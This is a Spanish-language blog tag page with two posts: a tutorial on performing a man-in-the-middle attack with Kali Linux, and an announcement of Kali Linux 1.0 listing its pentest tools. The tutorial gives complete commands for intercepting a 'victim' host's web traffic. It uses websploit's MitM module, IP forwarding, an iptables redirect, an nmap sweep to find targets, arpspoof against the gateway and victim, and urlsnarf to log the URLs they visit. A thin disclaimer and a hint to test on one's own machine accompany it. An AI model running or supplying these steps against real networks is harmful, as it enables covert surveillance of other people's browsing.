Mostrando las entradas con la etiqueta kali. Mostrar todas las entradas
Mostrando las entradas con la etiqueta kali. Mostrar todas las entradas

viernes, 14 de febrero de 2014

[Kali Linux] Efectuar MitM para ver urls

Como estoy haciendo una serie de tutoriales de pentest,no tanto en si pentest si no hasta ahora uno de spam otro de  information gathering otro de otra cosa,pero bueno se entiende el propósito,para que se entienda mejor y sea mas sencillo estas practicas recomiendo usar Kali Linux,puede ser Blackbuntu,BlackArch u otra distribución de Linux enfocada a la seguridad informatica. Yo en lo personal me gusta Kali pero en cualquier sistema Linux se pueden instalar los programas que aquí he mencionado y voy a mencionar aunque sea compilando,así que si no tienen las herramientas en su sistema y no tienen Kali Linux pueden buscar como instalar dicha herramienta en su sistema,sea Ubuntu,Arch,openSUSE,Gentoo,Fedora,etc.

Disclamer

Este tutorial es con fines de obtener conocimiento sobre el tema a nivel basico,la ejecución del mismo esta bajo el criterio del leector.

Bien,este tutorial lo pueden efectuar incluso sobre su localhost asi que no hay mucho problema si no tienen una segunda maquina donde hacer las pruebas.

Primero que nada que es MitM:

En criptografía, un ataque man-in-the-middle o JANUS (MitM o intermediario, en español) es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado. El atacante debe ser capaz de observar e interceptar mensajes entre las dos víctimas. El ataque MitM es particularmente significativo en el protocolo original de intercambio de claves de Diffie-Hellman, cuando éste se emplea sin autenticación.

Ataques:

El ataque MitM puede incluir algunos de los siguientes subataques:

  • Intercepción de la comunicación (eavesdropping), incluyendo análisis del tráfico y posiblemente un ataque a partir de textos planos (plaintext) conocidos.
  • Ataques a partir de textos cifrados escogidos, en función de lo que el receptor haga con el mensaje descifrado.
  • Ataques de sustitución.
  • Ataques de repetición.
  • Ataque por denegación de servicio (denial of service). El atacante podría, por ejemplo, bloquear las comunicaciones antes de atacar una de las partes. La defensa en ese caso pasa por el envío periódico de mensajes de status autenticados.

Fuente : es.wikipedia.org

Lo que nosotros vamos a realizar en este tutorial es un eavesdropping pero solo el analisis de trafico a nivel "humano" ya que podemos ver los datos en hex,pero aquí veremos las url directas.

Tutorial


Un nivel  Script Kiddies(automatizando con herramientas existentes),es el siguiente:

Usando websploit

Websploit nos probe una shell como la de Metasploit,como la que hice para ver los exif de una imagen.

Al ejecutar el programa:

websploit
Podemos ver la ayuda con help,al igual que metasploit cuenta con diferentes modulos,nosotros usaremos una para MitM:

use network/mitm

Vemos las opciones:

show options

Como vemos tenemos algunas opcines,vamos a setearlas:

set interface interfaz

set router gateway

set target ip_victima

set sniffer urlsnarf

En interfaz es la interfaz de nuestra red,si estamos por cable ethx,si estamos por wirless,wlanx.

En router ponemos la puerta enlace,para verla desde consola:

netstat -nr

En target ponemos la ip victima,podemos obtenerla haciendo un scan rango 24 con nmap al gateway:

nmap -sP gateway/24

o podemos poner nuestra propia ip dinamica,para no molestar a alquien mas y hacer pruebas.

En sniffer ponemos urlsnarf,este programa nos mostrara las url que esta viendo la ip que asignamos en target.


Ahora solo ejecutamos con:

run


Bien,con eso hacemos todos,cuendo comience a navegar el target nos mostrara las urls.


Ahora un nivel mas bajo,teclear todo nosotros mismos para ver por lo menos como se hace esto:

Primero que nada hacemos ip forward,en linux es tan facil como setear a uno la configuracion del archivo correspondiente:

echo 1 > /proc/sys/net/ipv4/ip_forward

Ahora tenemos que redirigir el trafico del puerto 80 basado en reglas de iptables,por ejemplo al puerto 8080:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Con eso esta listo el enrutamiento.

Ahora vamos a ver lo necesario,gateway y target:

Gateway:

route | sed -n "3p"

Targets:

nmap -sP gateway/24 | grep --color for

Con eso tenemos la informacion necesaria.

Ahora solo falta la suplantacion de ARP:

arpspoof -i interfaz -t gateway ip_victima

Lo podemos hacer dual para no errar.

Ahora solo ejecutamos urlsnarf,para analizar las urls luego lo redirigiremos con un estándar de unix:

urlsnarf -i interfaz  >> captura



 Para ver el resultado podemos hacerlo con cat,less,more:

cat captura
O podemos sacar las urls directamente con,una regex,por ejemplo con perl en una tuberia Unix:





cat captura  | perl  -lane 'while ($_ =~ m/\"(.+)\"/ig){ print $1."\n"}' | grep --color http://
Eso es todo.

Y recuerda si te sirvió y tienes cuenta de google dale google aya abajo

Leer más...

viernes, 22 de marzo de 2013

Kali Linux 1.0 Descarga Pentest Distro

Como saben no hago muchas entradas de pentest o si no saben no realizo muchas entradas sobre pentest,no digamos hacking digamos pentest(penetration testing) ya que la palabra hacking y hacker es muy extraña,que si hackers,crackers,lammers,script kiddies,{black,white,red}hat,etc para mi un hacker es como el señor Richard Stallman,Larry Wall o Linus Torvalds,aunque sepamos usar estas herramientas,aunque sepamos programar,no somos mas que pentesters o script kiddies,hasta que creemos un compilador un lenguaje de programación o un núcleo no seremos hacker.

Esto tal vez es extremista pero siempre he visto que personas se hacen llamar hackers y otras personas burlarse,el hecho es que como dije hacker es el tipo de "nivel" de las personas que acabo de mencionar, también lo hago porque se crea un cliché y hasta a mi las personas que conozco me dicen hacker, :S no saben ni lo que dicen.

Bueno yo "siempre" he usado este tipo de herramientas en Blackbuntu y Pentoo,mas que nada, también Backtrack y BlackBox en esta ocacion hablamos del nuevo Kali Linux de los creadores de backtrack :D



Esta es un contribución basada en Debian no en Ubuntu como backtrack así que en teoría es hermano de Ubuntu en vez de ser hijo,pero aun así es basado en APT, viene con iceweasel en vez de Firefox un navegador basado en Firefox,y como toda distro de pentest reúne las mejores herramientas de Pentest como:

Metasploit

Hydra

Nmap

Evilgrade

Burpsuite

Aircrack-ng

Hping

Wireshark

John the Ripper

sqlbruter

sqlmap

sqlninja

ettercap

dnsniff

Scripts en Python en Perl en Ruby,Lua y bash(no recuerdo en este momento)

Eso es parte de las herramientas que traen distros como backtrack y Pentoo,pero ademas trae herramientas de hardware hacking para android y arduino como

Smali

dex2jar

android-sdk




Herramientas de computo forense anti exploits(como rkhunter)

Esta para arquitecturas:

i386

amd64

armel

armhf

Con el entorno de Gnome 3.4 shell en modo fallback y en mini ISO

También cuenta con la opción de crear un LiveISO a nuestra medida

Enlace

Algo como lo estamos asiendo por aca 


Y bueno no les digo y a descargar :D

Enlace

Tambien cuenta con una mini ISO para hacer un netinstall



No esta de mas próximamente unos tutoriales de kali linux de pentesting o de alguna de sus herramientas,como dije esto es para pentesters no para hackers.
Leer más...